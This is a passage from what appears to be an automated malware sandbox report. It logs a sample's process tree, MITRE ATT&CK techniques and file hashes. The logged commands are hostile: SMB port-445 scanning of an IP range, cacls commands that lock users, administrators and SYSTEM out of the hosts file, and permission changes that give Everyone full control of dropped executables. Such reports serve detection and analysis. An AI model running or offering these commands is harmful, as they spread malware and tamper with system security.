PID:3964
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\grcbdiffb\bbccvkzri\scan.bat2⤵PID:760
-
C:\Windows\grcbdiffb\bbccvkzri\qiezzkiir.exeqiezzkiir.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5540
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5852
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2280
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5352
-
-
-
C:\Windows\SysWOW64\ogiqci.exeC:\Windows\SysWOW64\ogiqci.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2624
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F1⤵PID:2124
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:800
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F2⤵PID:3676
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F1⤵PID:4364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3428
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F2⤵PID:4604
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wufpycp.exe1⤵PID:1560
-
C:\Windows\ime\wufpycp.exeC:\Windows\ime\wufpycp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4608
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F1⤵PID:5152
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F2⤵PID:3504
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F1⤵PID:5676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5124
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F2⤵PID:2760
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wufpycp.exe1⤵PID:3724
-
C:\Windows\ime\wufpycp.exeC:\Windows\ime\wufpycp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2120
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD57f12b6468efff935b824c737b465a943
SHA151fc3a3762f089bd5d044da15c800ace7258f5e5
SHA256f37d6e864e75975fcf3e87c4362ddeca628fada5b22e6c2f999b64158072f449
SHA51292b34113ebfea77c17b6601500f9c3c3b48e5454c260fee857b332e9b5bcc3838667ec5c7e65ff7506e81152c4a6ca38163f8933bd2430386a10f0ab60f38bb0
-
Filesize
8.6MB
MD5ccabd31b1e2a04e8247692843d4038e7
SHA191b69ea4c091ae5c53a3858e5c644230158fdc9f
SHA256a985dc7cf66bb36df2e6360ec3228b1ff3980d0ffd0db53355cc437ed8e605f0
SHA5126301863f748edecfc12b72fd54594f0cd4635ead09e49fd1539e3ade23ffe4d408d1e0774021271035a608943c992c80e6ebde6676ae913ae5b46ab02a693b0b
-
Filesize
7.6MB
MD5a8a0e89264e55464fb8bf659066076a9
SHA10063b035cea799896bde495919f104d39299005b
SHA256f2e5857f5c1f5699cb2952c3953d0e4c2ba8beca39d449cedf4a5e4ffa6824c2
SHA51289fa4961a0211eb36e956b74b5e951e938ed11184b732e57c4beade8343c645f56e18d620c69ba35f90bfbe35e3fa17633602a0a17be3a957c81b5b4a6566d8d
-
Filesize
822KB
MD55b765e53767c5df4e350e15411c24b9f
SHA1ebe004fa28966df6347a88608327fc5113aff358
SHA2568d461b82c703610006e26beaed91ec57dfedf8b69ffb53b6a32d31fd4a0cf397
SHA512667083f973b4d882eb637a494dff7ab6d01db25a99cf23b39cecb8b953491fc22ddc2e5f0df8f77ab6e6bf292dd3a68ea682607bc5d7d0db3e727968693396c3
-
Filesize
3.7MB
MD5610a74b0f7a73f87a8ffb1e26afcf444
SHA17f2fdd1a885ee5b39d4b60a1560faeb29532b76b
SHA256168e20ed86c6336aea7fdf7b266a2d3a13c9d0c45b8c7f64ab5ba27dbd823037
SHA512bdfde564304dc7b10b68159579c445d099f7f3f73ebfc37eefbdb1a077f5e76c358a0ca356c7f18fccec59343c9c10c3dde4c33c1efc6fea46ecaf0696023c65
-
Filesize
33.7MB
MD562cd7ebc375cc4ad15308abbf5cdffdd
SHA1892334bed97e2c2d418f7183dcf3101d39ca0cbd
SHA256692bdca08a5b59050bc550b7cdd3a166c3e48e047be0815d3eef7191740d237e
SHA512977eee14088f9fbf30f15602c45e11622d2c9bb7bb0f749a2604ba6fbd8287424c659b99679b8aacbc87875b57e1652d63e7414600243079f7694f63432b1278
-
Filesize
25.9MB
MD57608f54eef31eaaf7aead26810b85537
SHA1d79e87e2d7edf323ec7ff06178aecf9da66959a8
SHA25636cb7da842accd16d54a4016ab96463814e5a62a1291f0c23626945d7eecf530
SHA512e69052f0e20d0c3efb9732c02903e1777ac8937e09e7cfa7c44c90bd54a9590171a123c2fd15e67c950b7df9d1f818c7cf3c63cf6521688b77e7ee57d9bc7a59
-
Filesize
2.5MB
MD550e7c1d7d18bc95f23be176b4db93d8d
SHA186e12847a0111eae66e035296074e15cc522dba7
SHA256008e556ba3495722df3e3759006f87330b7b45e1c78336c184536baf7d33785b
SHA5121dc284f72d4e55acc8faf3411c9fa12e5280774137dd9c11f69b581786b627f60f8b7a14d435b6ff0f3ca477ea0c75ab5a53bea72f99618d29096cee0d7f4982
-
Filesize
20.4MB
MD58000f238b5431816184e581646f4aeab
SHA1da662f2d267d07b8f7096ea2a981e2bd406c7176
SHA256378d5fbbbec06e95e8f871f7774a350c2496af1c216864a62df949daa3a8929b
SHA512ba5f1752bed4f7d9c5b414d77ef436b7a77ef79da1190f99acbc8494cc08bb7e70a51e336e724250e4add7fa31bb6cc608d920c0fdcaa17f6df635f52ce6f930
-
Filesize
1.2MB
MD5855ed1292da240083799a1c2dbe02fca
SHA1468c83abeecb891c2c45e3e296615c8b99d3f8bc
SHA25683f9eb7bfd4dbb2c061d06802dfdbe361ca4bb8670a1c9e58d65b04bc7d12ade
SHA51276e8b658d585798117c55aec4f60d3689e69b3c42876227b3ea4073cd7cb0f3a8a7d883ae70370630c8b22f35188bd8c10339c5ebfcefc84ff1c871cdc2136c9
-
Filesize
3.9MB
MD500dd74ba26df94a60d82fc88c1b4b225
SHA18d5a35ad3de64288ef4f6627f62c792de431801c
SHA2568bdf1375d874063e6e49df0441d8eadda3512868eef96a1bbd95c2ce6db33e6a
SHA5128dd65bb855b8669a0f4dea2b93d6f750a0c76a42ccd7ba059131b5f7eacae068a13d86afda015c54ac11199699b4833ad7ae915125f9795886f8c5c2d441c82b
-
Filesize
44.0MB
MD50605add5c631ea520b6b90dde2c91df9
SHA1ab7a35b6d492b91b824c8d323e176b8ba18edec9
SHA256db4a082cb81e9420c101b915e09fe388c7d1cfe0d19e788a0484c48d7416fae0
SHA512df5499497c6ea664b0615d6a252886241fe29f381821fc50aec4f043b0018f72177248f06c7fa3e0289c87bc3acd17196688d473a60436bc378b8eb33f647001
-
Filesize
3.0MB
MD5aa0c875f7281fdfe7fad745c7bff4e90
SHA105e11f26440d57d88255d8d9f1afea4f4d5a86e2
SHA256005b12aa9ee223aa9b137cf56ed8dfd5dad618744637fe12f09ec6b31e53f40a
SHA512191848676c27a305abf90190e8b4466e485bc84f56e79680588d9cc5f8f79828164a64f72e703f52015ba6cc398cd8698f593fff163d9ca51b5e0baec637fb55
-
Filesize
3.4MB
MD58104ec5a968c3c2e97825310caea03cc
SHA18b791e05404ddccb33b92f21fae00df41c0f2e68
SHA25640d1303d314423015a3873e7c5092b924d4b2e916992fce598f1739a919a0d1b
SHA512a9a8573d4444af63670453554809312bbb5d2d7ad09993fdf360a5062000c017a5006728b7cc0abfd09bd5afe3fda958c929bb2e796faf1938e610c70de33f0f
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.5MB
MD52e9befb1aeb14e49bed714fee60fd09e
SHA1e9ee51a8b618c59ba9768282479ee42d8a0c4130
SHA2568e1c977ebf4ea0fc9c9d541f40d30d519e0e4a6f061a1d87d98014a3681868a8
SHA51222418756d70b056361e2e6b02439c70f88d6bed22059f33c2ec0c20870bd788d6378921ffad8dcf42435825d7bbe74c1daed9f6118798a023b5d968f1362eb76
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376